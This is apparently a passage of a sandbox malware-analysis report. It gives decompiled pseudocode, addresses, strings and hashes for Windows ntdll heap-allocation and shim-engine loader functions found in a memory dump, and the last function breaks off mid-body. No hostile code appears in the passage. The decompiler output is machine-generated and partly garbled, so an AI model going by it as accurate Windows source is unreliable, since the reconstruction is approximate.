								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x36bd47ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E36ADB910();
								} else {
									E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E36B8823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E36ADB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x36bd47a1 = 1;
									 *0x36bd4100 = 0;
									asm("int3");
									 *0x36bd47a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E36ADB910("About to reallocate block at %p to %Ix bytes\n",  *0x36bd47c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x36bd374c; // 0x0
					 *0x36bd91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}

0x36b8fdf4
0x36b8fdf6
0x36b8fdfb
0x36b8fe02
0x36b8fe04
0x36b8fe09
0x36b8fe0c
0x36b8fe16
0x36b8fe35
0x36b8fe38
0x36b8fe46
0x36b8fe4b
0x36b8fe4d
0x36b90277
0x36b90277
0x36b9027a
0x36b9027a
0x36b902c2
0x36b902c9
0x36b902ce
0x00000000
0x36b902ce
0x36b8fe56
0x36b8fe58
0x36b8fe62
0x36b8fe65
0x36b8fe69
0x36b8fe72
0x36b8fe72
0x36b8fe6b
0x36b8fe6b
0x36b8fe6b
0x36b8fe81
0x36b8fe84
0x36b8fe87
0x36b8fe8a
0x36b90231
0x36b90231
0x36b90237
0x36b9023a
0x36b90259
0x36b9025e
0x36b9023c
0x36b90251
0x36b90256
0x36b90264
0x36b9026f
0x00000000
0x36b90274
0x36b8fe90
0x36b8fe93
0x00000000
0x00000000
0x36b8fe9b
0x36b8fe9f
0x36b8fea2
0x36b8feaa
0x36b8feaf
0x36b8feb6
0x36b8feb6
0x36b8febb
0x36b8febb
0x36b8fec2
0x36b8fec7
0x36b8feca
0x36b8fecd
0x36b8fed1
0x36b8feda
0x36b8feda
0x36b8feda
0x36b8fedc
0x36b8fedf
0x36b8fee7
0x36b8fee9
0x36b8feee
0x36b8fef0
0x36b90122
0x36b90122
0x36b90125
0x36b90127
0x00000000
0x00000000
0x36b9012d
0x36b90133
0x36b90139
0x36b901a7
0x36b901aa
0x36b901ad
0x36b901b2
0x00000000
0x00000000
0x36b901bc
0x36b901c3
0x00000000
0x00000000
0x36b901cd
0x36b901d4
0x00000000
0x00000000
0x36b901da
0x36b901e0
0x36b901e3
0x36b90202
0x36b90207
0x36b901e5
0x36b901fa
0x36b901ff
0x36b90218
0x36b90219
0x36b90224
0x36b9017e
0x36b9017e
0x36b90184
0x36b90188
0x36b9018e
0x36b90195
0x36b9019b
0x36b9019c
0x36b9019c
0x00000000
0x36b90188
0x36b9013b
0x36b9013e
0x36b9015d
0x36b90162
0x36b90140
0x36b90155
0x36b9015a
0x36b90168
0x36b90176
0x00000000
0x36b8fef6
0x36b8fef6
0x36b8fefc
0x36b8ff02
0x36b8ff70
0x36b8ff73
0x36b8ff76
0x36b8ff7b
0x36b90068
0x36b90070
0x36b90075
0x36b90078
0x36b9007a
0x36b90080
0x36b90080
0x36b90083
0x36b90087
0x36b90090
0x36b90090
0x36b90090
0x36b90092
0x36b90094
0x36b90097
0x36b9009a
0x36b9009f
0x36b900a9
0x36b900ac
0x36b900ae
0x36b900af
0x36b900b3
0x36b900b3
0x36b900ac
0x36b900b8
0x36b900bc
0x36b900ec
0x36b900ef
0x36b900f2
0x36b900be
0x36b900c0
0x36b900c5
0x36b900ca
0x36b900d1
0x36b900e3
0x36b900d3
0x36b900d4
0x36b900d9
0x36b900dc
0x36b900df
0x36b900df
0x36b900e6
0x36b900e6
0x36b900f5
0x36b900f9
0x36b900fc
0x36b90108
0x36b9010e
0x36b9010e
0x36b9010e
0x36b900fc
0x36b90114
0x36b90119
0x36b9011d
0x00000000
0x36b9011d
0x36b8ff81
0x36b8ff88
0x00000000
0x00000000
0x36b8ff8e
0x36b8ff91
0x36b8ff94
0x36b8ff97
0x36b8ff9c
0x36b8ffa6
0x36b8ffa9
0x36b8ffab
0x36b8ffb0
0x36b8ffb5
0x36b8ffb5
0x36b8ffa9
0x36b8ffb8
0x36b8ffbc
0x36b8ffce
0x36b8ffd1
0x36b8ffd4
0x36b8ffbe
0x36b8ffc0
0x36b8ffc5
0x36b8ffc8
0x36b8ffc8
0x36b8ffd7
0x36b8ffd9
0x36b8ffdd
0x36b8ffe0
0x36b8ffea
0x36b8fff0
0x36b8fff0
0x36b8fff0
0x36b8fff2
0x36b8fff5
0x36b90065
0x36b90065
0x36b8fff7
0x36b8fff7
0x36b8fffe
0x00000000
0x00000000
0x36b90004
0x36b9000b
0x00000000
0x00000000
0x36b9000d
0x36b90013
0x36b90016
0x36b90035
0x36b9003a
0x36b90018
0x36b9002d
0x36b90032
0x36b90040
0x36b9004b
0x36b9004c
0x36b9004f
0x36b90058
0x36b9005d
0x36b8ff47
0x36b8ff47
0x36b8ff4d
0x36b8ff51
0x36b8ff57
0x36b8ff5e
0x36b8ff64
0x36b8ff65
0x36b8ff65
0x36b8ff51
0x00000000
0x36b8fff5
0x36b8ff04
0x36b8ff07
0x36b8ff26
0x36b8ff2b
0x36b8ff09
0x36b8ff1e
0x36b8ff23
0x36b8ff31
0x36b8ff3f
0x36b8ff44
0x00000000
0x36b8ff44
0x36b8fe18
0x36b8fe20
0x36b8fe28
0x36b8fe2e
0x36b902d1
0x36b902d4
0x36b902e0
0x36b902e0

APIs

RtlDebugPrintTimes.NTDLL ref: 36B8FE28

Strings

HEAP[%wZ]: , xrefs: 36B8FF19, 36B90028, 36B90150, 36B901F5, 36B9024C
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 36B9021F
HEAP: , xrefs: 36B8FF26, 36B90035, 36B9015D, 36B90202, 36B90259
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 36B9026A
Just reallocated block at %p to %Ix bytes, xrefs: 36B90171
About to reallocate block at %p to %Ix bytes, xrefs: 36B8FF3A
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 36B90053
RtlReAllocateHeap, xrefs: 36B8FE3F, 36B8FEE2

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
Instruction ID: 4eedffcfce2c743df6b1098fa0ba3636c6064a7067d15db2ca366bfbb921b245
Opcode Fuzzy Hash: d091f5f8c0912806dd1b35aea736566b78f7ef582739a2b5e84235d5f5513ae9
Instruction Fuzzy Hash: 06D1CF79900695EFDB01CFA4C850AEABBF2FF5A754F0480ADE844AB262C739D941CF51

Uniqueness

Uniqueness Score: -1.00%

Function 36B8F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E36B8F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push("true");
				_push(0x36bbd320);
				E36B37BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E36AD7662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E36B8F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_push("true");
						_pop(_t92);
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E36ADB910();
						} else {
							E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E36ADB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E36AEFED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E36B90835(_t188, 0);
						_t184 = E36AF5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E36B90D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E36B9D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E36B13AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E36B0FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E36B90835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x36bd47c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x36bd47c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x36bd47c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E36ADB910();
								} else {
									E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E36B8823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E36ADB910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E36ADB910();
								} else {
									E36ADB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E36ADB910("Just allocated block at %p for %Ix bytes\n",  *0x36bd47c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x36bd47a1 = 1;
									 *0x36bd4100 = 0;
									asm("int3");
									 *0x36bd47a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x36bd3748; // 0x0
					 *0x36bd91e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x36b8f0a5
0x36b8f0a7
0x36b8f0ac
0x36b8f0b3
0x36b8f0b5
0x36b8f0ba
0x36b8f0bd
0x36b8f0c7
0x36b8f0e3
0x36b8f0e6
0x36b8f0f4
0x36b8f0f9
0x36b8f0fb
0x36b8f3d2
0x36b8f3d2
0x36b8f3d5
0x36b8f3d5
0x36b8f3d8
0x36b8f3df
0x36b8f3e4
0x00000000
0x36b8f3e4
0x36b8f104
0x36b8f106
0x36b8f10b
0x36b8f111
0x36b8f114
0x36b8f117
0x36b8f119
0x36b8f11c
0x36b8f11e
0x36b8f11e
0x36b8f12e
0x36b8f134
0x36b8f137
0x36b8f139
0x36b8f13b
0x36b8f13b
0x36b8f13c
0x36b8f13f
0x36b8f142
0x36b8f144
0x36b8f350
0x36b8f350
0x36b8f356
0x36b8f359
0x36b8f378
0x36b8f37d
0x36b8f35b
0x36b8f370
0x36b8f375
0x36b8f383
0x36b8f38e
0x00000000
0x36b8f14a
0x36b8f14a
0x36b8f14d
0x00000000
0x00000000
0x36b8f153
0x36b8f156
0x36b8f15e
0x36b8f163
0x36b8f16a
0x36b8f16a
0x36b8f170
0x36b8f170
0x36b8f177
0x36b8f186
0x36b8f188
0x36b8f18b
0x36b8f18f
0x36b8f194
0x36b8f196
0x00000000
0x36b8f19c
0x36b8f19c
0x36b8f19f
0x36b8f1a3
0x36b8f1ac
0x36b8f1ac
0x36b8f1ac
0x36b8f1ae
0x36b8f1b0
0x36b8f1b3
0x36b8f1b6
0x36b8f1bb
0x36b8f1c5
0x36b8f1c8
0x36b8f1ca
0x36b8f1cb
0x36b8f1cf
0x36b8f1cf
0x36b8f1c8
0x36b8f1d4
0x36b8f1d8
0x36b8f208
0x36b8f20b
0x36b8f20e
0x36b8f1da
0x36b8f1dc
0x36b8f1e1
0x36b8f1e6
0x36b8f1ed
0x36b8f1ff
0x36b8f1ef
0x36b8f1f0
0x36b8f1f5
0x36b8f1f8
0x36b8f1fb
0x36b8f1fb
0x36b8f202
0x36b8f202
0x36b8f202
0x36b8f211
0x36b8f214
0x36b8f218
0x36b8f21b
0x36b8f227
0x36b8f22d
0x36b8f22d
0x36b8f22d
0x36b8f22f
0x36b8f236
0x36b8f238
0x36b8f23c
0x36b8f23c
0x36b8f244
0x36b8f24a
0x36b8f250
0x36b8f2be
0x36b8f2c1
0x36b8f2c4
0x36b8f2c9
0x00000000
0x00000000
0x36b8f2cf
0x36b8f2d2
0x36b8f2d5
0x00000000
0x00000000
0x36b8f2db
0x36b8f2e2
0x00000000
0x00000000
0x36b8f2ec
0x36b8f2f3
0x00000000
0x00000000
0x36b8f2f9
0x36b8f2ff
0x36b8f302
0x36b8f321
0x36b8f326
0x36b8f304
0x36b8f319
0x36b8f31e
0x36b8f337
0x36b8f338
0x36b8f343
0x00000000
0x36b8f252
0x36b8f252
0x36b8f255
0x36b8f274
0x36b8f279
0x36b8f257
0x36b8f26c
0x36b8f271
0x36b8f27f
0x36b8f28d
0x36b8f295
0x36b8f295
0x36b8f29b
0x36b8f29f
0x36b8f2a5
0x36b8f2ac
0x36b8f2b2
0x36b8f2b3
0x36b8f2b3
0x00000000
0x36b8f29f
0x36b8f250
0x36b8f196
0x36b8f0c9
0x36b8f0ce
0x36b8f0d6
0x36b8f0dc
0x36b8f3e7
0x36b8f3ea
0x36b8f3f6
0x36b8f3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 36B8F0D6

Strings

HEAP[%wZ]: , xrefs: 36B8F267, 36B8F314, 36B8F36B
HEAP: , xrefs: 36B8F274, 36B8F321, 36B8F378
Just allocated block at %p for %Ix bytes, xrefs: 36B8F288
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 36B8F389
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 36B8F33E
RtlAllocateHeap, xrefs: 36B8F0ED

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
Instruction ID: 4943578917f142952d8c88f11d4d7566b78f2fa07641303f77f3f259da751aab
Opcode Fuzzy Hash: 1eaaa593e22898c021e045f1deb0f5e73dd9eb49cd95d369533e164495cd7d57
Instruction Fuzzy Hash: 3E912F799006D5EFDB11DFB8C850A9DBBF6FF49390F148099E840AB251CB3A9941CF12

Uniqueness

Uniqueness Score: -1.00%

Function 36AD640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E36AD640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x36bdb370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_push("true");
				_pop(_t49);
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E36AD6C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x36bd37c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E36ADBA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E36B24B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E36B5E692();
					_t85 =  *0x36bd37c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E36AFE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E36AD6B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E36B0E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x36bd37c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E36B5E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x36bd37c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x36bd5d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E36B17DF6( *((intOrPtr*)(_t108 + 0xc)));
					E36AFD3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E36AD6868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x36bd37c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x36bd9208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x36bd5b24; // 0x68b2ce0
					asm("ror esi, cl");
					 *0x36bd91e0( &_v876, _t71 + 0x24, _t99, "true");
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E36AD6565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x36ad6415
0x36ad6422
0x36ad642e
0x36ad642f
0x36ad6434
0x36ad6438
0x36ad643a
0x36ad643b
0x36ad6440
0x36ad6446
0x36ad644e
0x36ad6458
0x36ad6460
0x36ad6465
0x36ad646c
0x36b39770
0x36b39776
0x36b39779
0x36b397b3
0x36b397b3
0x36b397dd
0x36b397dd
0x36b397e3
0x36b397e3
0x36ad6542
0x36ad6542
0x36ad654a
0x36b3982b
0x36b3982b
0x36ad6557
0x36ad6558
0x36ad6559
0x36ad6564
0x36ad6564
0x36b3977b
0x36b3977c
0x36b39781
0x36b39783
0x36b39788
0x36b397a0
0x36b397a0
0x36b397a5
0x36b397aa
0x36b397b0
0x00000000
0x36b397b0
0x36ad647e
0x36ad648b
0x36ad6498
0x36ad649e
0x36b397ed
0x36b397ed
0x36ad64a4
0x36ad64a6
0x36b397f7
0x36b397fc
0x36b397fe
0x36b397ce
0x36b397d3
0x36b397d8
0x36b397d8
0x36b397db
0x00000000
0x36ad64ac
0x36ad64b0
0x36ad64be
0x36ad64c3
0x36ad64cc
0x36ad64d1
0x36ad64d8
0x36b39802
0x36b39808
0x36b3980b
0x00000000
0x00000000
0x36b3978f
0x36b39790
0x36b39795
0x36b39796
0x36b3979b
0x00000000
0x36b3979b
0x36ad64de
0x36ad64eb
0x36ad64f1
0x36ad64f9
0x36ad6507
0x36ad6510
0x36ad651c
0x36ad6526
0x36ad652c
0x36ad653c
0x36b3981d
0x36b3981d
0x36ad653c
0x00000000
0x36ad6526

APIs

RtlDebugPrintTimes.NTDLL ref: 36AD651C

Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD6614
Part of subcall function 36AD6565: RtlDebugPrintTimes.NTDLL ref: 36AD665F

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 36B397B9
apphelp.dll, xrefs: 36AD6446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 36B39790
LdrpInitShimEngine, xrefs: 36B39783, 36B39796, 36B397BF
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 36B3977C
minkernel\ntdll\ldrinit.c, xrefs: 36B397A0, 36B397C9

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
Instruction ID: acabc8ddf4db439111903f7f48f82e6cb8d9fe82294b058a1f4e9bb82885ad56
Opcode Fuzzy Hash: a374f13e3e9b9f0ea931b93e5de168b1f361acfab8b3c33e1627ee112961dd68
Instruction Fuzzy Hash: F151B071609300EFE310EF24CD60E5ABBE5FB84644F500919FA849B2A1EB34D945CF93

Uniqueness

Uniqueness Score: -1.00%

Function 36ADD2EC Relevance: 11.6, Strings: 9, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E36ADD2EC(unsigned int __ecx, signed int _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16) {
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v164;
				void* _t116;
				void* _t124;
				char* _t134;
				void* _t155;
				char* _t170;
				char _t171;
				void* _t176;
				signed int _t181;
				void* _t184;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t200;

				_t200 = (_t198 & 0xfffffff8) - 0x74;
				_t170 = _a12;
				_v100 = __ecx;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
